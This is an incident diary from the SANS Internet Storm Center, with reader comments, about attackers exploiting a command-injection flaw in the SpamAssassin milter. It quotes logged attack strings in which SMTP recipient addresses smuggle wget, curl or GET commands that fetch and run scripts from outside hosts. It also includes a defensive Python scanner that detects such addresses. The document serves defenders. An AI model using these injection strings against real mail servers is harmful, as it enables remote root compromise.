SANS ISC: Spamassassin Milter Plugin Remote Root Attack - SANS Internet Storm Center


Spamassassin Milter Plugin Remote Root Attack

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt;perl p.txt:   smtp.target.com[10.11.17.18] : User unknown in local recipient
       table; from=<blue@attacker.com> to=<root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)

Handler Bojan notes that the bad guys appear to have started actively exploiting the SpamAssassin milter (spamass-milter) vulnerability published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).

The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80; that host appears to be unreachable at the moment, though.
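As an added example (not part of the diary or of spamass-milter), here is a small Python scan a mail admin could run over their MTA log to spot recipient addresses shaped like the one above (a local part carrying "+:" followed by a pipe), plus a check for the "-x" expansion flag in a Red Hat style /etc/sysconfig/spamass-milter. The log lines and hosts are constructed placeholders, not real indicators.

```python
import re

# Constructed sample lines modelled on the diary's logwatch excerpt and the
# rcpt-to patterns reported in the comments; hosts are placeholders, not IoCs.
SAMPLE_LOG = """\
Mar 10 11:02:01 mx postfix/smtpd[1234]: NOQUEUE: reject: RCPT from unknown[192.0.2.10]: 550 <root+:|wget hxxp://example.invalid/.x/p.txt;perl p.txt>: User unknown in local recipient table; from=<blue@attacker.invalid> to=<root+:|wget hxxp://example.invalid/.x/p.txt;perl p.txt>
Mar 10 11:03:15 mx postfix/smtpd[1234]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: 550 <root+:"|curl http://example.invalid/busy-3.php">: User unknown in local recipient table; from=<x@attacker.invalid> to=<root+:"|curl http://example.invalid/busy-3.php">
Mar 10 11:04:00 mx postfix/smtpd[1235]: NOQUEUE: reject: RCPT from unknown[198.51.100.8]: 550 <bob+newsletter@example.invalid>: User unknown in local recipient table; from=<c@example.invalid> to=<bob+newsletter@example.invalid>
Mar 10 11:05:22 mx postfix/qmgr[99]: 4F2A1: from=<alice@example.invalid>, size=2048, nrcpt=1 (queue active)
"""

CLIENT = re.compile(r"RCPT from \S*\[([^\]]+)\]")   # connecting client address
ADDR = re.compile(r"<([^>]*)>")                       # every <address> on the line
# Local part with the milter's "+:" expansion marker followed by a pipe
# (optionally inside double quotes), then the first word of the piped command.
INJECT = re.compile(r'^([^@<>]*?)\+:"?\|\s*(\S+)')

def scan_log(text):
    """Return one finding per distinct injected recipient per log line."""
    findings = []
    for line in text.splitlines():
        ip = CLIENT.search(line)
        seen = set()
        for addr in ADDR.findall(line):
            m = INJECT.match(addr)
            if not m or addr in seen:
                continue
            seen.add(addr)
            findings.append({
                "client": ip.group(1) if ip else None,
                "user": m.group(1),        # local user being targeted (e.g. root)
                "command": m.group(2),     # wget / curl / GET ... for triage
                "recipient": addr,
            })
    return findings

def expand_flag_enabled(sysconfig_text):
    """True if EXTRA_FLAGS in a sysconfig file passes -x (address expansion)."""
    for line in sysconfig_text.splitlines():
        line = line.strip()
        if line.startswith("EXTRA_FLAGS="):
            tokens = line.split("=", 1)[1].strip().strip("\"'").split()
            return "-x" in tokens
    return False

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} -> {f['user']} via {f['command']}: {f['recipient']}")
    print("expansion enabled:", expand_flag_enabled('EXTRA_FLAGS="-m -r 15 -x"'))
```

Normal plus-addressing such as bob+newsletter@ is not flagged; only the "+:" marker followed by a pipe is.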

Cheers,
Adrien de Beaupré
EWA-Canada.com


Adrien de Beaupre

353 Posts
ISC Handler
On FreeBSD, a fix hasn't yet made it into ports. Is there any mitigation against this attack aside from disabling spamass-milter for the time being?
parseword

9 Posts
I'm using spamass-milter on CentOS 5.x (a.k.a. Red Hat Enterprise Linux). Fortunately, the RPM as distributed by Red Hat doesn't use the "-x" flag. *whew* Just check your /etc/sysconfig/spamass-milter EXTRA_FLAGS to see if you added it yourself.

To double-check I attempted the exploit described at the Full Disclosure link (above) and it didn't work.
parseword
3 Posts
I have logged attempts to use curl as well.

rcpt to: root+:"|wget http://213.186.44.xxx/blue.php"

rcpt to: root+:"|wget http://61.100.185.xxx/busy-1.php"
rcpt to: root+:"|GET http://61.100.185.xxx/busy-2.php"
rcpt to: root+:"|curl http://61.100.185.xxx/busy-3.php"
Travis

5 Posts
@BillBixby: The preliminary patch linked to in the article applies nicely within the port. Just copy it to ${PORTSDIR}/mail/spamass-milter/files/patch-popen and force a rebuild and reinstall of spamass-milter. Tested here on a couple of MTAs (8R-p2 base Sendmail).
Matt

7 Posts
